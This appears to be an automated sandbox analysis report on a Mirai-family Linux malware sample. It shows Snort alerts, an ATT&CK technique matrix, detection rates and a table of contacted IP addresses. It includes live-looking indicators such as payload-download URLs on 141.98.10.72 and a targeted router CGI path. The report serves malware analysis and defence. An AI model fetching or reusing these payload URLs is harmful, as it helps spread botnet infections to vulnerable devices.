    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: Yara matchFile source: dump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
    OS Credential Dumping
    11
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    Service Stop
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
    Ingress Tool Transfer
    Scheduled TransferData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1391982 Sample: uR2hnJKQGC.elf Startdate: 14/02/2024 Architecture: LINUX Score: 88 26 13.18.83.146 XEROX-WVUS United States 2->26 28 41.21.227.60 Vodacom-VBZA South Africa 2->28 30 98 other IPs or domains 2->30 34 Snort IDS alert for network traffic 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 Detected Mirai 2->38 40 3 other signatures 2->40 8 uR2hnJKQGC.elf 2->8         started        signatures3 process4 process5 10 uR2hnJKQGC.elf 8->10         started        12 uR2hnJKQGC.elf 8->12         started        15 uR2hnJKQGC.elf 8->15         started        signatures6 17 uR2hnJKQGC.elf 10->17         started        20 uR2hnJKQGC.elf 10->20         started        22 uR2hnJKQGC.elf 10->22         started        24 3 other processes 10->24 42 Sample tries to kill multiple processes (SIGKILL) 12->42 process7 signatures8 32 Sample tries to kill multiple processes (SIGKILL) 17->32

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    uR2hnJKQGC.elf66%ReversingLabsLinux.Trojan.Mirai
    uR2hnJKQGC.elf65%VirustotalBrowse
    uR2hnJKQGC.elf100%AviraEXP/ELF.Mirai.Bootnet.Gen.o
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://141.98.10.72/bins/x860%Avira URL Cloudsafe
    http://192.168.0.14:80/cgi-bin/ViewLog.asp0%Avira URL Cloudsafe
    http://141.98.10.72/zyxel.sh;0%Avira URL Cloudsafe
    http://192.168.0.14:80/cgi-bin/ViewLog.asp1%VirustotalBrowse

    Download Network PCAP: filteredfull

    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://192.168.0.14:80/cgi-bin/ViewLog.aspfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://141.98.10.72/bins/x86uR2hnJKQGC.elffalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/soap/encoding/uR2hnJKQGC.elffalse
      high
      http://141.98.10.72/zyxel.sh;uR2hnJKQGC.elffalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/soap/envelope/uR2hnJKQGC.elffalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        164.56.126.206
        unknownUnited States
        158ERI-ASUSfalse
        4.189.236.244
        unknownUnited States
        3356LEVEL3USfalse
        41.97.15.218
        unknownAlgeria
        36947ALGTEL-ASDZfalse
        197.141.53.63
        unknownAlgeria
        36891ICOSNET-ASDZfalse
        85.2.228.2
        unknownSwitzerland
        3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
        95.88.56.8
        unknownGermany
        31334KABELDEUTSCHLAND-ASDEfalse
        121.197.237.36
        unknownChina
        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
        14.255.164.83
        unknownViet Nam
        45899VNPT-AS-VNVNPTCorpVNfalse
        184.127.146.137
        unknownUnited States
        7922COMCAST-7922USfalse
        31.210.249.115
        unknownSweden
        35706NAOSEfalse
        94.102.16.25
        unknownRussian Federation
        42514SIGNAL-ASZheleznogorskRussiaRUfalse
        95.255.225.237
        unknownItaly
        3269ASN-IBSNAZITfalse
        62.92.203.157
        unknownNorway
        2119TELENOR-NEXTELTelenorNorgeASNOfalse
        94.98.191.219
        unknownSaudi Arabia
        25019SAUDINETSTC-ASSAfalse
        95.20.61.26
        unknownSpain
        12479UNI2-ASESfalse
        95.141.197.184
        unknownRussian Federation
        44158ALTURA-ASRUfalse
        62.132.39.133
        unknownGermany
        286KPNNLfalse
        73.57.186.192
        unknownUnited States
        7922COMCAST-7922USfalse
        138.110.205.59
        unknownUnited States
        396349FIVE-COLLEGE-DATA-NETWORK-ASUSfalse
        85.108.172.35
        unknownTurkey
        9121TTNETTRfalse
        88.1.220.205
        unknownSpain
        3352TELEFONICA_DE_ESPANAESfalse
        85.69.64.161
        unknownFrance
        21502ASN-NUMERICABLEFRfalse
        94.22.161.79
        unknownFinland
        15527ANVIASilmukkatie6VaasaFinlandFIfalse
        85.25.248.119
        unknownGermany
        8972GD-EMEA-DC-SXB1DEfalse
        178.197.14.220
        unknownSwitzerland
        3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
        85.248.194.85
        unknownSlovakia (SLOVAK Republic)
        5578AS-BENESTRABratislavaSlovakRepublicSKfalse
        85.4.81.11
        unknownSwitzerland
        3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
        13.18.83.146
        unknownUnited States
        26662XEROX-WVUSfalse
        86.119.95.145
        unknownSwitzerland
        559SWITCHPeeringrequestspeeringswitchchEUfalse
        94.153.184.220
        unknownUkraine
        15895KSNET-ASUAfalse
        31.16.255.157
        unknownGermany
        31334KABELDEUTSCHLAND-ASDEfalse
        62.68.231.160
        unknownEgypt
        24835RAYA-ASEGfalse
        41.165.243.33
        unknownSouth Africa
        36937Neotel-ASZAfalse
        71.115.255.7
        unknownUnited States
        701UUNETUSfalse
        108.149.101.132
        unknownUnited States
        16509AMAZON-02USfalse
        216.146.73.144
        unknownUnited States
        16399FIRSTCOMM-AS2USfalse
        94.65.191.22
        unknownGreece
        6799OTENET-GRAthens-GreeceGRfalse
        85.168.96.32
        unknownFrance
        21502ASN-NUMERICABLEFRfalse
        179.122.131.31
        unknownBrazil
        26615TIMSABRfalse
        95.108.101.49
        unknownPoland
        43118EAW-ASEastandWestNetworkPLfalse
        85.21.46.85
        unknownRussian Federation
        8402CORBINA-ASOJSCVimpelcomRUfalse
        95.19.24.247
        unknownSpain
        12479UNI2-ASESfalse
        62.222.185.10
        unknownIreland
        8918CARRIER1-ASIEfalse
        62.1.242.92
        unknownGreece
        1241FORTHNET-GRForthnetEUfalse
        31.161.195.255
        unknownNetherlands
        1136KPNKPNNationalEUfalse
        183.59.34.236
        unknownChina
        4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
        95.122.127.105
        unknownSpain
        3352TELEFONICA_DE_ESPANAESfalse
        32.62.48.2
        unknownUnited States
        2687ATGS-MMD-ASUSfalse
        198.68.175.16
        unknownUnited States
        1239SPRINTLINKUSfalse
        31.133.168.246
        unknownSwitzerland
        51290HOSTEAM-ASPLfalse
        87.125.105.240
        unknownSpain
        12430VODAFONE_ESESfalse
        95.153.235.180
        unknownRussian Federation
        29497KUBANGSMRUfalse
        85.97.99.121
        unknownTurkey
        9121TTNETTRfalse
        184.161.229.4
        unknownCanada
        5769VIDEOTRONCAfalse
        4.219.204.203
        unknownUnited States
        3356LEVEL3USfalse
        95.166.18.165
        unknownDenmark
        3292TDCTDCASDKfalse
        94.159.123.224
        unknownRussian Federation
        49531NETCOM-R-ASRUfalse
        62.131.13.134
        unknownNetherlands
        1136KPNKPNNationalEUfalse
        94.204.106.201
        unknownUnited Arab Emirates
        15802DU-AS1AEfalse
        205.103.18.252
        unknownUnited States
        647DNIC-ASBLK-00616-00665USfalse
        94.151.70.245
        unknownDenmark
        9158TELENOR_DANMARK_ASDKfalse
        79.114.177.230
        unknownRomania
        8708RCS-RDS73-75DrStaicoviciROfalse
        31.61.72.73
        unknownPoland
        5617TPNETPLfalse
        124.74.175.255
        unknownChina
        4812CHINANET-SH-APChinaTelecomGroupCNfalse
        9.59.0.37
        unknownUnited States
        3356LEVEL3USfalse
        62.68.231.186
        unknownEgypt
        24835RAYA-ASEGfalse
        31.228.35.241
        unknownGermany
        3320DTAGInternetserviceprovideroperationsDEfalse
        88.128.233.147
        unknownGermany
        3320DTAGInternetserviceprovideroperationsDEfalse
        172.152.208.88
        unknownUnited States
        7018ATT-INTERNET4USfalse
        85.193.76.25
        unknownRussian Federation
        209231CCNLfalse
        41.21.227.60
